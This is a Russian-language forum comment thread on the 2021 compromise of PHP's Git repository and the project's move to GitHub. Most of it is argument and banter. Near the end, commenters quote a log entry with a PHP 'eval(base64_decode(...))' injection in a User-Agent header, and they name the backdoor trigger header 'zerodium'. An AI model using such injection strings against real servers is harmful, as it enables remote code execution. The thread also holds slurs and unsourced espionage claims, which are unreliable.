Разработчики проекта PHP предупредили о компрометации Git-репозитория проекта и обнаружении двух вредоносных коммитов, добавленных 28 марта в репозиторий php-src от имени Расмуса Лердорфа, основателя PHP, и Никиты Попова, одного из ключевых разработчиков PHP...Подробнее: https://www.opennet.me/opennews/art.shtml?num=54858
>перенесли эталонный репозиторий на платформу GitHubМикрософт: Нет, разумеется мы не имеем никакого отношения к этому публично нами осуждаемому взлому, в результате которого ещё один очень важный инфраструктурный проект перешел на полностью контролируемый нами GitHub.
Никита Попов в Микросовте работает?JetBrains, который помог совершить один из самых больших взломов (сейчас за него готовят нехилые санкции) - это подразделение Микрозофт?
Касперский, который тырил файлы западных спецслужб при помощи своих мелварей - входят в состав Майкрософт?
> JetBrains, который помог совершить один из самых больших взломов (сейчас за него готовят нехилые санкции)Чего, блин?
Там teamcity торчал голым задом в интернет с паролем типа admin 123.
В этом, конечно, виноват jetbrains.
ну так и девки ходили задом вертели, провоцировали
/Чекатило/И Касперский говорит: "Само вышло!!!! Нечаянно!!! Это не мы!".
Почему же само? В документации там явно указано, что подозрительные файлы могут быть отправлены на сервера Касперского для дополнительного анализа. Ровно этим же занимается ЛЮБОЙ антивирус.То, что к серверам Касперского могут иметь доступ российские спецслужбы - это другой разговор. Но тут точно так же, как и к серверам Microsoft могут иметь доступ американские спецслужбы.
Антивирус Касперского по факту шпионская программа гебни. А ты говоришь могут иметь доступ. Ну чо, отите иметь на своём компьютере товарища майора?
То есть, получается, в АНБ США были не в курсе, что это шпионская программа гебни? :-)
Там ср-ный копчоный аутсорсер брал работу на дом, но в целом да, были не в курсе. kav поставлялся в том числе госучреждениям, хотя и попроще nsa - те просто в силу привычки никому не верить его у себя не применяли.А что кашперский, вопреки вранью, как оказалось п-т не "свертки", и даже не "фрагменты", а целиком секретные документы - это, как видишь, рашкованов совсем не расстроило, "это ж не шпионаж", "всего на пол-шишечки!", "сразу вынул!".
Там Женечка врал очень показательно. "Мы не копировали! Это не мы! И сразу же удалили, как только поняли, что украли!" - причем все это умудрился примерно так сформулировать в одном и том же письме - прям вот чувствуются уроки высшей школы КГБ, внезапно, в стремной ситуации, пробившиеся через годы работы под прикрытием.
Ну а потом проскользнула инфа как все было на самом деле - похоже, там п-здинг "нефрагментов" по запросу доступен сотрудникам из числа избранных, и один оказался излишне любопытен (ну а ты бы отказался подержать в руках настоящий секретный документ nsa? Даже найух ненужный). Т.е. kav таки именно троянец с полным внешним управлением.
Ох, я был лучшего мнения об АНБ. Про связи Касперского с фейсами только ленивый не знал, это секрет полишинеля.Видать, такие же олухи, как и наши - сертификат есть, значит все окей :-)
Ну как бы надо было начинать с вопроса откуда там - аутсорсеры, берущие работу (секретную!) на дом.
Причем через десять лет после того как Сноуден (ТОЖЕ аутсорсер по контракту) съыбалсо со всей скандальной инфой.А "press enter" - это, сынок, фантастика. Ненаучная.
Оно в Израиле, а не в NSA.
та анб, как глянешь, такая же дырявая контора, как и фсб/кгб. только бюджет больше и понты толще.у одних начальник архива 15 лет переписывал архивные дела и держал у себя на даче, у других контрактор десять лет копировал секретные документы себе на жесткие диски и контрактили админов у всяких буз алленов без скрининга.
но касперский конечно, красава, мало что засветился с этим анбшным ноутом, так еще сделал это в прямом эфире на глазах у еврейской разведки.
> та анб, как глянешь, такая же дырявая контора, как и фсб/кгб. только
> бюджет больше и понты толще.Ну вот от АНБ нам хотя бы приличная коллекция эксплойтов перепала - а от этих товарищей-в-сером какой обществу толк?
> но касперский конечно, красава, мало что засветился с этим анбшным ноутом, так
он отдельно красава потому что ТАК врать - это надо было ну очень сильно быть битым на утренниках в школе КГБ. (Сейчас, конечно, все потерли, кто успел, тот успел.)
> еще сделал это в прямом эфире на глазах у еврейской разведки.
А вот это как слуцилась - как раз тайна, покрытая мраком. То ли документ был с сюрпризцем, то ли не только сотрудники касперского могут тырить документы с помощью своего троянца, но и еще кое-кто, кто этого троянца сам затроянил... В общем, в любом случае ну его найух такой клубок.
> который тырил файлы западных спецслужб при помощи своих мелварейДа в общем-то не тырил. Это вполне не_скрываемый конторой функционал - отправка фрагментов подозрительных документов на анализ.
В десяточке у виндового защитника, примеру, подобное включено по умолчанию с той лишь разницей, что Микрософт не несёт абсолютно никакой ответственности за какой-либо ущерб или неприятности, связанные с утечкой потенциально конфиденциальных данных
Пароли бы лучше менять научились, санкции они готовят
РЖД тоже не умеет на своих мокротиках. Д@лб@#бы везде одинаковые.
> Касперский, который тырил файлы западных спецслужб при помощи своих мелварейЕмнип, суть инцидента состояла в том, что эвристический анализатор Касперского заподозрил ранее неизвестную малварь в свежескомпилированном бинарнике на компе программиста АНБ, который как раз занимался разработкой малвари, и отослал этот подозрительный файл в Лабораторию.
Скорее у какого-нибудь подрядчика. Если прямо в офисах АНБ, то это какой-то позор, там каждый байт исходящего трафика должен быть под контролем, да и что там антивирус Касперского делал вне изолированной от сети песочницы, непонятно.
Не, это, вроде бы, его личный ноут был, на котором он дома работал.
А нехрен на личном ноуте выносить государственные секреты.
Ну не на государственном же их выносить?
> который как раз занимался разработкой малвари, и отослал этот
> подозрительный файл в Лабораторию.Такое змеиное гнездо что даже и не поймешь кто стремнее.
Про Касперского есть некоторые основания верить.Но JetBrains чем провинились? Это офигенная компания с офигенной репутацией.
Нафига западные спецслужбы себе антивирус злейшего партнера ставят да ещеи при разработке своих троянов? Анекдот какой-то
ЗЫ: если и security@php.net взломан, то все письма будут заменяться на картинку единорога на радуге и значит уязвимостей нет?
не шиза ли у вас часом, товарищ
> на полностью контролируемый нами GitHubЧто конкретно Microsoft там контролирует? Говна вместо мозгов положили при рождении? Или это Open Source головного мозга?
Перенести проект с GitHub на свой хостинг - делов на полчаса при хорошем канале.
// b.
Да вообще миррор с него сильно быстрее сделался так то.
Если ломанут GitHub это будет полный коллапс
Шапочку из фольги свою постирай.
Важный инфраструктурный проект? Ору)
А вот это не очень хорошо. Страны, на которые действуют санкции, теперь не будут иметь доступа к репе.
> Страны, на которые действуют санкции, теперь не будут иметь доступа к репе.И кто в этом виновать?
Конечно же всякие iPony с фракталами. Один вечный неосилятор всё выпиливает, второй прото проржавел и всё портит и разваливает проекты впихивание ржавых технологий.
ржавые технологии неплохи, что бы вы там не ныли про утечки памяти в редоксе
Это пока на синтаксис не посмотришь. Оброс костылями хуже плюсоты.
Санкции ограничивают продажу услуг, соответственно, относятся только к платным услугам гитхаба. Склонировать репозиторий и предлагать пул-реквесты с бесплатным аккаунтом никто не запрещает.
ПОКА не запрещает. Принять нужный закон - не проблема. Могут даже свои.
Принять закон могут какой угодно и где угодно.
Поэтому надо не забывать о распределенности гита, и не сильно завязываться на специфичные для вендора фичи. В конце концов, если у всех есть локальные копии, всегда можно откатиться на обмен патчами через git send-email. А как одна из копий гит-репозитория гитхаб ничем не хуже других.
Это вдвойне хорошо.
Что впрочем не отменяет того, что сам факт компрометации инфраструктуры - это очень плохо.
Так это ж отлично
Так это хорошо. Люди всегда должны пожинать последствия своих решений.
да что вы говорите, как так то?
> поддержание своими силами Git-инфраструктуры создаёт дополнительные риски безопасностиЛогика ушла и не вернётся.
Инфраструктура сама себе поддерживает, ага.
> Инфраструктура сама себе поддерживает, ага.та всё как обычно: на php глобусе принято работать много, долго и тупо, а админы у них настолько суровы что... их нет.
>Также предлагается запретить прямое добавление изменений, не прошедших предварительного рецензирования.Лол. То есть до этого можно было?
Прод тестинг деливери не слышал про такое? Да мейнтенеры даже и не понимают что там меняется от патча поэтому смотрят только по выходу.
Смузи девопсы. Вот так не осилили гит. Перешли в гитхаб, в надежде, что код сам себе ревью сделать и сам себя протестит.
Ключевым разработчикам ядра - конечно.Не знаю, как сейчас, но несколько лет назад тех, кто понимает, как работает zend engine, было всего три человека - Дмитрий Стогов, Никита Попов, и китаец с красивым именем Hui. Друг друга они и так ревьюили в своих приватных бранчах.
итого, "Hui поймёт" - девиз всего их движке. =) думаю, многие согласятся, что подозревали нечто подобное. некоторые - аргументированно и давно.
Ну как раз эти трое порядок более-менее навели где смогли. Новый код даже читабелен. Но в целом там, да, как в любом проекте с более чем 20-летней историей, черт ногу сломит.
Ну конечно у них стоял GitWeb 2.11.0 2016 года. Так это даже не последний патч который был 2.11.4.Что характерно это недоразумение еще и написано на С.
переписывай на руст
Да, и смело закапывай весь проект. Как известно раст не пережил ещё ни один проект.
на похапэ
Интересно сколько минут продержался бы гитеа
> GitWeb
> написано на СТы GitWeb с CGit, случаем, не перепутал?
Когда хрустиков такие мелочи смущали? :)
>PHP
>обнаружении двух вредоносных коммитовОни не ошиблись? Судя по счётчику на гитхабе, там 123393 вредоносных коммитов.
Судя по счетчику на опеннете у анонима 38+ тыс вредоносных комментов
Это почти на порядок меньше -- лучше выбирать меньшее зло.
да и ноосферу не за$рали^W^W^W на сообщество меньше вреда.
> В Git-репозитории проекта PHP выявлены вредоносные измененияКто-то закоммитил туда интерпретатор языка PHP. Нанесён колоссальный вред всему IT сообществу. Десятки тысяч детей никогда не смогут нормально программировать после того, как увидели PHP. Бородатые сишники опеннета вместе с двумя анонимусами ЛОРа срочно готовятся к экспедиции в прошлое для того, чтобы не допустить этот инцидент и спасти человечество от страшного будущего.
Linux-way: нас похакали! Выводим сайты в off-line на целый месяц, проводим тщательный аудит всей инфраструктуры, разворачиваем её заново и выводим в онлайн, сотрудничаем с ФБР и в конце-концов ловим того хакера, от которого получаем ещё больше информации о взломе.PHP-way: нас похакали))) А х.з. как это случилось и где дырка))0 Я в админстве не особо силён) Короч го на GitHub я создал, официальная разработка теперь там будет, присоединяйтесь)))0
Вот поэтому и PHP-помойка.
Ну так Zend давно уже, оказавшись на грани банкротства, продался Perforce и с тех пор вообще никак не участвует в разработке самого PHP, все держится на небольшом сообществе. Инфраструктура как была с тех времен, когда ей занимался Zend, так и осталась, у разработчиков на Си не очень получается заниматься системным администрированием.Учитывая ситуацию, вполне понятное решение.
> проводим тщательный аудит всей инфраструктуры, разворачиваем её заново и выводим в онлайнУ вас есть на это несколько сотен тысяч баксов, не? Только языком чесать?
> в конце-концов ловим того хакера, от которого получаем ещё больше информации о взломе.
БОльшая часть взломов не раскрывается.
> Короч го на GitHub я создал, официальная разработка теперь там будет, присоединяйтесь)))0
Единственно правильное решение, когда нет ни ресурсов, ни времени, а работа стоит.
> Вот поэтому и PHP-помойка.
Это можно сказать про ваш комментарий и уровень интеллекта.
// b.
PHP-головного мозга детектед.
>Только языком чесать?Ты бы и собаке язычком потрепал
> Linux-way: нас похакали! Выводим сайты в off-line на целый месяц, проводим тщательный
> аудит всей инфраструктуры, разворачиваем её заново и выводим в онлайн, сотрудничаем
> с ФБР и в конце-концов ловим того хакера, от которого получаем
> ещё больше информации о взломе.https://www.opennet.me/opennews/art.shtml?num=43915
> Разработчики дистрибутива Linux Mint сообщили об инциденте, в результате которого злоумышленникам удалось подменить ссылки на установочные iso-образы, предлагаемые для загрузки с сайта проекта.
> Интересно, что после устранения первой атаки администраторы инфраструктуры Linux Mint оставили сайт в работе, после чего сразу последовал второй взлом, в результате которого ссылка была повторно подмененаhttps://www.opennet.me/opennews/art.shtml?num=51045
> На официальной странице компании Canonical на GitHub зафиксировано появление десяти пустых репозиториев с именами "CAN_GOT_HAXXD_N". В настоящее время данные репозитории уже удалены, но их следы осели в web-архиве. Никакой информации о компрометации учётной записи или вандализме со стороны сотрудников пока нет. Также пока не ясно, затронул ли инцидент целостность существующих репозиториев.Опеннетно-аноним-way: нафантазировать что-то, не имеющее ничего общего с реальностью.
Php норм язык. Вот в Python полный трындец.Лучше бы их оба закопать и Perl сверху приложить.
А перл-то за что?
За компанию?
Перл будет охранять нечестивую гробницу.
> Вот поэтому и PHP-помойка."внезапно" оказалось, что программисты( в т.ч сишники ) не очень дружат с администрированием
Ну все надо переходить на языки, которые пилят толстые корпарации. C#, Go, Node.js, Oracle Java ждут тебя, мой падаван, любителя корпоративно огороженного софта.
А у них просмотра перед коммитом другим разработчиком нет? Если есть, то нужно же всего лишь исключить все коммиты которые прошли "review" оставшиеся и будут "плохими".
PHP, Node.js -- два дырявых брата-акробата, которые подрабытывают клоунами смеша достопочтенную IT-публику. Как же хорошо, что OpenNET написан на истинном языке программирования!
Раст забыл.
Неужто на Lisp?
> Неужто на Lisp?На лиспе хакерньюс, тут какая-то скриптошляпа. Но качество платформы не очень высокое, постоянно то крякозябры из-за koi8r, то код корёжит, то вообще какие-то [an error occurred while processing this directive] -- это не из-за языка, из-за экосистемы языка возможно.
Судя по всему, оно тут настолько поддерживаемое, что никогда не будет починена излишняя ширина страницы на телефонах, из-за чего первым делом приходился всё отзумливать, а потом читать, иначе — горизонтальный скрол. Да ещё и кнопки под отправкой поста недостаточной ширины для надписей на них, а капча выходит не сразу, а после попытки отправки.
зато регистрироваться не надо и другие свистоперделки факультативны
> В Git-репозитории проекта PHP выявлены вредоносные измененияЭто добавление исходников PHP.
Ну хоть будем теперь знать, что чуть что можно смело будет пинять на микрософт.
Майки и взломали всем же это ясно.
Что за мойки ?
Воу, воу, воу.
Короче от сборки свежих версий пока лучше воздержаться.
Увольте уже девляпсов, возьмите нормальных админов.
Нормальные за деньги работают, к сожалению.
А миллиардеры не хотят админить, хотя казалось бы - о еде могут уже и не думать.Скажи спасибо, что хоть сами разработчики еще нормальные и смогли вовремя заметить.
Пц... они расписались в своей неспособности содержать в порядке свои сервера и контролировать работу участников проекта.
К сожалению да.
Как будто, нельзя было на своих серверах ввести цифровую подпись и предварительное рецензирование коммитов.
> Как будто, нельзя было на своих серверах ввести цифровую подпись и предварительное
> рецензирование коммитов.как будто при взломе сервера кто-то помешает мне закомитить без подписи и рецензирования, а то и подделать второе и имитировать в веб-интерфейсе первое, все равно ты никакие подписи отродясь вручную не проверяешь - зелененькое "verified" - о, ок, правильные пацаны подписали!
Они все правильно сделали - взломали сервер - меняй сервер, не жди пока еще раз взломают. А что это опять шитхап - ну так неадмину действительно выбора нет. А разработчики всегда и везде очень хреновые админы.
Нанять настоящего - а ты им много денег задонейтил? И я хрен. А настоящий жрать хочет. За еду работать - не хочет.Ну и роспозора теперь можно не бояться. Хотя, подозреваю, они ему аплодировали.
> Как будто, нельзя было на своих серверах ввести цифровую подпись и предварительное
> рецензирование коммитов.Не все Линусы.
Так как нет уверенности в надёжности сервера ... перенесли эталонный репозиторий на платформу GitHub.
И что-то от этого изменилось?
Вот на GitLab никак нельзя, нужно обязательно на M$ GitHub, где до сих пор нельзя по ключу ED25519 авторизироваться, но зато санкции для Крыма поддерживаются.
гитлаб такая же говнина. так гитхаб хоть привычный/популярный.
> гитлаб такая же говнинаЧто за чушь Вы вбрасываете?
GitLab ограничивает крымчан?
GitLab ограничивает использование ED25519 ключей?> гитхаб хоть привычный/популярный.
А, у нас тут хипстер-неасилятор под портретом Ленина нарисовался, тогда понятно, вопросов больше не имею.
Гитлаб дропает продакшн-базу
> Гитлаб дропает продакшн-базуПодробности и пруфы можно, или я должен Вам поверить на слово?
google://opennet gitlab база данных
https://www.opennet.me/opennews/art.shtml?num=45957
Это? 1 единственный инцидент более чем 3-ёх летней давности?
3-рех.
дорогой мой, для проекта размером с гитлаб (особенно как конторы, торгующей в т.ч. инцидент менеджментом) - это на один инцидент больше, чем допустимо.ну и вы, видимо, не стали читать подробностей. а подробности тут дорогого стоит, из инцидентов с опубликованным подробным разбором за последние годы, это прям мама таких инцидентов.
как честно признались эти орлы, из шести методов репликации/резервного копирования пять(!) не работали правильно, или не были настроены вообще. это много говорит о надежности и предсказуемости их инфраструктуре на момент три года назад.
GitLab, вообще-то сделан украинцами, у них даже тризуб на страничке "GitLab Hall of Fame" имеется. А когда на Россию и Китай наложили санкции, руководство GitLab'а поставило вопрос о найме сотрудников из этих "неблагонадёжных" стран. И основатель GitLab -- Дмитрий Запорожец не был против блокировки РФ вообще.
Не имею ничего против того, что он сделан Украинцами, скорее это огромный плюс!
Я не знаю и не хочу знать про слухи о том кто там был против или за, но по факту
1 GitLab полноценно работает в Крыму.
2 GitLab авторизирует по ключу ED25519.
3 GitLab можно в любой момент экспортировать и развернуть у себя локально (не проверял).
По факту GitHub и GitLab — две стороны одной медали. Это коммерческие проекты и делается там всё в угоду прибыли. Если завтра удалить все репозитории и аккаунты пользователей с территории России станет выгоднее, чем не удалять их — они будут удалены в одночасье. Собственно, это главное, о чём стоит помнить.
А в остальном, принимая технические решения о том, где хранить код и где апрувить pull request'ы, нужно уметь трезво взвешивать все риски и выбирать оптимальный вариант.Для команды core-разработчиков PHP вариант с GitHub'ом, насколько я знаю, наиболее оптимальный, потому что у них дофига опыта работы с ним в рамках других активностей, а жонглировать несколькими технологиями для решения схожих задач — отличный вариант, но только если вам некуда девать свободное время.
> ...у них дофига опыта работы с ним...Даже не знаю как сказать, чтобы донести мысль правильно и не напороться на срачь.
Звучит как если бы Вы при сравнении мышей genius и какого-то недавнего бренда, моделей, которые стоят одинаково, но у последних есть боковая прокрутка и возможность переназначить боковые клавиши написали мол: когда бренд молодой он всегда стремиться предоставить что-то новое чтобы иметь возможность конкурировать, но если он станет популярным, то он мало будет отличаться от своего конкурента, и у них ДОФИГА ОПЫТА работы с мышками Genius, по этому они выбрали Genius... и далее бред про жанглирование временем.
Даже опыт работы с разными видеоплеерами (vlc и mpv/smplayer) отличается гораздо сильнее, чем опыт работы с git-web шкурками, по этому кроме как с мышками разных производителей не знаю с чем и сравнить этот многочисленный и ценный опыт.
Возможно вы меня неправильно поняли.Есть core-разработчики PHP. Основную часть времени они проводят, работая с проектами на GitHub (своими, не относящимися к php-src, или сторонними). Они знают GitHub от и до, со всеми его фичами. А с другой стороны есть (а вернее был) свой хостинг под git-репозиторий, без большинства из этих фич.
Как пример — GitHub Discussions против mail list'ов, на которых строится обсуждение всего и вся в команде разработки PHP. Уже не раз поднималась тема удобства первых по сравнению со вторыми, но каждый раз разговор заканчивался на том, что "у нас не GitHub, поэтому проехали".По моему мнению тут давно напрашивалось применение бритвы Оккама, а история со взломом просто послужила катализатором. У GitLab'а нет таких ярких преимуществ, которые одновременно и затмили бы GitHub, и побудили бы сообщество разработчиков PHP идти и разбираться с тем, как там решаются задачи, которые большинство уже умеет решать в рамках GitHub'а.
> GitLab ограничивает крымчан?Хрен его знает, но юзерам тора они пытаются показать капчу, при том - самозабанив свой же фрейм капчи ... своими же полисями?! Многое говорит о "качестве" кода. В общем не фанатам этого крапа на пхп быковать, вот уж дно-софт.
А бонусом совершенно отвратительный интерфейс, в котором черт ногу сломит, в отличие от гитхаба и дикие тормоза и жрач оперативки этим кошмариком. Булшит а не софт.
После покупки Microsoft GitHub стало более опасней там держать всё если взломают это будет мощно
> После покупки Microsoft GitHub стало более опасней там держать всё если взломают
> это будет мощноодно из преимуществ ms - что у них таки наверняка ЕСТЬ бэкап и процедура восстановления. Потому что тот треш что у шитляпа объяснялся очевидным - денег на нормальные бэкапы жадные xoxлы просто зажали. "ну вот мы вам купили за гроши пару свалок в разных местах, ни в одну целиком и на регулярной основе не поместится, ну придумайте что-нибудь". И то же самое с восстановлением - т-по не дали денег на параллельную тестовую инфраструктуру, где его можно было бы кое-как тестировать.
А у ms деньгов - просто завались.
Ну да, ну да, вон в арктический контейнер забэкапались. Ща побегут откапывать его для твоего васянокрапа, а не потомков. Тем более что ты не вон те персонажи и пару лет щит не заметишь вообще, а потом уже и бэкапы хрен найдешь.
Можно теперь деньги в фаундейшн просить и микрософта.
nikic@php.net мы тоже скомпрометировали.
Только у меня возникает ощущение, что все эти "странные" взломы как раз для того и происходят, чтобы разработчики убедившись в своей неспособности поддерживать инфраструктуру перешли на Гитхаб ВНЕЗАПНО принадлежащий компании, которая называла опенсорц вирусной чумой? Я понимаю, конечно, что резервные копии кода есть, но если завтра МС со словом "кек" просто снесет Гитхаб (напрочь) Опенсорц получит урон от которой будет оправляться годами.
Они ведь правда неспособны, кто-то решил напомнить. В данном случае этот кто-то решил сообщить о многолетнем бэкдоре.
> Они ведь правда неспособны, кто-то решил напомнить. В данном случае этот кто-то
> решил сообщить о многолетнем бэкдоре.Но корпорация зла - это все равно мы, смотри не перепутай!
> сообщить о многолетнем бэкдореИли заставить поохотиться в тёмной комнате на чёрную кошку,которой там нет. Это очень забавно выглядит со стороны.
Судя по коду - попытался закосить под невинное изменение, а если не прокатило то на типа-древний-бэкдор. Туповатая социальная инженерия с потугами замести следы.Хидер кстати забавный - USER_AGENTT. ЧСХ кто-то сразу заметил "исправление типо" с ... новым типо.
> завтра МС со словом "кек" просто снесет ГитхабНе снесут из-за юридических обязательств.
Если это будут делать, то предупредят за несколько дней\недель\месяцев. Успеем скачать... не всё, но самое ценное забрать успеем.
> Не снесут из-за юридических обязательств.вспомните, как парлера вынесли. Щёлк - и нету хостинга, без суда и следствия. Дак что вы там про обязательства говорили?
Пора строить Лепрозорий для опенсорсных проектов. Чтоб нормальных пользователей они не беспокоили.
Не только у вас, но читать такие комменты грустно, потому что создаётся впечатление, что вы любите теории заговоров.1. Те, кто интересуется вопросом организации работы с кодом на стороне core-разработчиков PHP, в курсе, что уже далеко не раз поднимались вопросы неудобства собственных инструментов по сравнению с инструментами GitHub'а. В частности, Попов не раз говорил, что GitHub для него удобен, понятен, там есть функциональные возможности, которые пригодились бы сообществу разработчиков PHP, и которых совсем нет в их собственной инфраструктуре. Но они не переходят на GitHub потому что "исторически так сложилось" и потому что, как я понимаю его слова, есть среди core-разработчиков люди, имеющие право вето в инфраструктурных вопросах (по-видимому речь про Лердорфа). Поэтому отъезд на GitHub внезапным точно не назвать.
2. Если завтра MS решит снести GitHub, то в первую очередь он выстрелит себе в голову, потому что планета сойдёт со своей оси — образно, конечно, выражаясь, но лишь от части. Количество жизненно важных проектов в GitHub'е исчисляется тысячами. Учитывая тенденции последних лет, мне кажется, что каждый двадцатый разработчик под Windows посчитает своим долгом портировать своё приложение на Mac/Linux и никогда больше с MS не иметь ничего общего.
3. Это git, на секундочку. Любой из разработчиков PHP восстановит репозиторий через 5 минут на другом хостинге. То же касается любого активного проекта. Погибнут только те, где не осталось активных разработчиков, да и там сам код, в большинстве случаев, уцелеет, погибнет только история.Поэтому, как мне кажется, всё не так мрачно.
> 2. Если завтра MS решит снести GitHub, то в первую очередь он выстрелит себе в головуЯ никогда не задумывался о таком гипотетическом сценарии, потому что его безбашенная невероятность не приходила мне в голову, и спасибо тебе за то, что я о нём подумал.
Если завтра MS решит снести GitHub, то народ свалит на GitLab, на SourceHut, или на что-нибудь ещё. Одновременно с этим появятся десятки клонов github'а, на разных движках, всё это поварится год, и в результате получится примерно то же, что и было. Может быть, вместо одного центра будет несколько, но суть от этого не изменится: возможность хостить сорцы бесплатно на чужих мощностях -- это очень удобно, и нужны очень сильные аргументы, чтобы отказываться от этого. А раз есть спрос, то будет и предложение.
> 3. Это git, на секундочку. Любой их разработчиков PHP восстановит репозиторий через 5 минут на другом хостинге. То же касается любого активного проекта. Погибнут только те, где не осталось активных разработчиков, да и там сам код, в большинстве случаев, уцелеет, погибнет только история.
Вопрос в issues, PR и прочей метаинформации, которую github хранит вне репа. Они будут потеряны безвозвратно. Паранойики могут эту информацию бэкапить с github'а, на случай если github сдохнет, но таких мало. Кстати, тут возникает мысль, что желающие насолить майкрософту имеют возможность запилить что-то эдакое, что позволит бекапить информацию с github'а, и в случае блокировки репа поднимать зеркало за минуты на любой vps'ке. Тогда свободные проекты будут иметь возможность эксплуатировать MS тогда, когда они только начинаются и когда они ещё никому не нужны, а когда они нужны, и у них есть возможность собрать донатов на поддержание собственной инфраструктуры, они лёгким движением руки оторвутся от MS и отправятся в свободное плавание. Или может не на любую vps'ку ориентироваться, а на безболезненную миграцию между github, gitlab и sourcehut. Тогда шансы на вендорлок процесса разработки сведутся к околонегативным значениям.
>[оверквотинг удален]
> — образно, конечно, выражаясь, но лишь от части. Количество жизненно важных
> проектов в GitHub'е исчисляется тысячами. Учитывая тенденции последних лет, мне кажется,
> что каждый двадцатый разработчик под Windows посчитает своим долгом портировать своё
> приложение на Mac/Linux и никогда больше с MS не иметь ничего
> общего.
> 3. Это git, на секундочку. Любой из разработчиков PHP восстановит репозиторий через
> 5 минут на другом хостинге. То же касается любого активного проекта.
> Погибнут только те, где не осталось активных разработчиков, да и там
> сам код, в большинстве случаев, уцелеет, погибнет только история.
> Поэтому, как мне кажется, всё не так мрачно.Чисто для проформы - не люблю теорий заговора, да и коммент мой был в игривом духе написан.
То что Гитхаб удобен я давно заметил. Не зря же даже Мозилла кучу свои субразразработок (все что было с Растом, например, Серво, и прочее) изначально вели на Гитхабе. Да и сейчас там что-то продолжается именно на Гитхабе. И это притом что Багзилла как бы "родной продукт, родная среда".
"Учитывая тенденции последних лет, мне кажется, что каждый двадцатый разработчик под Windows посчитает своим долгом портировать своё приложение на Mac/Linux и никогда больше с MS не иметь ничего общего."
Ну, не хочу портить настроение, но мы уже слышали подобное когда МС например хотели подмять под сбя магазины видеоигр и софта того же. Тот же Вальв начал кричать что "Линукс - лучшая платформа для игр" и хоть вода продолжает камень точить прям прорыва пока не видно, а лозунгов поубавилось."Любой из разработчиков PHP восстановит репозиторий через 5 минут на другом хостинге. То же касается любого активного проекта."
Абсолютно верно, но как вы сами говорите - часть все таки погибнет. Да, мелочь, да полузаброшенная, но имиджовый и прямой урон будет. Микрософту кстати будет прямой убыток, но им не привыкать.
Абсолютно было предсказуемо, что они на гитхаб перелезут. Вот ведь в чем штука:$ grep -i php scum
Rasmus Lerdorf (PHP Project Founder)
...этими изменениями оказался сам код похапэ.
И снова очередной взлом
Сложно не взломать, когда пароли вида "ромашка".
Не до конца понял, поломали все же сервер или у них не было проверки подписи коммитов и просто внесли от чужого имени?
да там вообще проходной двор какой-то, а не сервак.
Не было подписи коммитов и свое чудо git
да, по логам есть такое:'HTTP_USER_AGENT' => '<?php eval(base64_decode(\"Lyo8P3BocCAvKiovCkBlcnJvcl9yZXBvcnRpbmcoMCk7CkBzZXRfdGltZV...
закрыли своим fast_reject'ом пару недель вроде как
а вона в чем дело было
Ты ошибся, там User-Agentt: zerodium[eval]
> Дополнительно рассматривается вопрос о переходе к обязательному заверению коммитов цифровой подписью разработчика. Также предлагается запретить прямое добавление изменений, не прошедших предварительного рецензирования.Это хорошая практика для всех проектов. Необходимо еще ключи секретные аппаратно защищать.
Необходимо еще исходный код отправлять в министерство проверки исходного кода.
вот вы смеётесь, а в штатах сахарные мальчики регулярно ходят в конгресс... на собеседование, правильно ли они ведут свои соцсети.
Это другое, понимать надо
Практика с цифровыми подписями хорошая, но нужно помнить, что обязательное заверение коммитов ими — это платная фича на GitHub'е.
В данном случае никто не преследовал цели сорвать куш (по $4 с носа в месяц для core-разработчиков PHP — много не наберётся), но если массово погнать всех на тариф GitHub Pro, получится прилично.
какой ужас
Вредоносные регрессии...
Следующая новость: у Расмуса Лердорфа выявлены вредоносные изменения
"Дополнение: Из-за проведения аудита формирование новых релизов заморожено на две недели"от он где основной ужас - как же мы теперь без ежедневных релизов то? Как теперь бежать впереди паровоза то? Ведь в современной эпохе должно как быть - пока распаковал и настроил текущий релиз, релиз уже должен уйти на десять версий вперёд минимум. Главнейшее требование к айтиструктуре сегодня - это перманентное, непрерывное, бездумное обновление. Всё должно постоянно, непререрывно качаться-обновляться. Какой тестинг и проверка на безопасность - паровоз же убежит вперёд. Непременно ежедневные релизы и непременно запилить принудительные неотключаемые апдейты, как у мелкософта, гугла, мозиллы и прочих. ... а теперь беда - две недели пользователи не смогут реплицировать новые эксплойты на свои сервера. Надо за эти две недели депрекэйтить и выпилить половину функционала ... ну то есть перейти на новые улучшенные и поновому заэксплойченые либы. Пусть эти гнустные вебмакаки переписывают свои серевера - такой кайф смотреть как они суетятся в комментах, не понимают дураки, что это повод по новой подоить заказчика ... если конечно не подписывали какую бесплатную поддержку на год.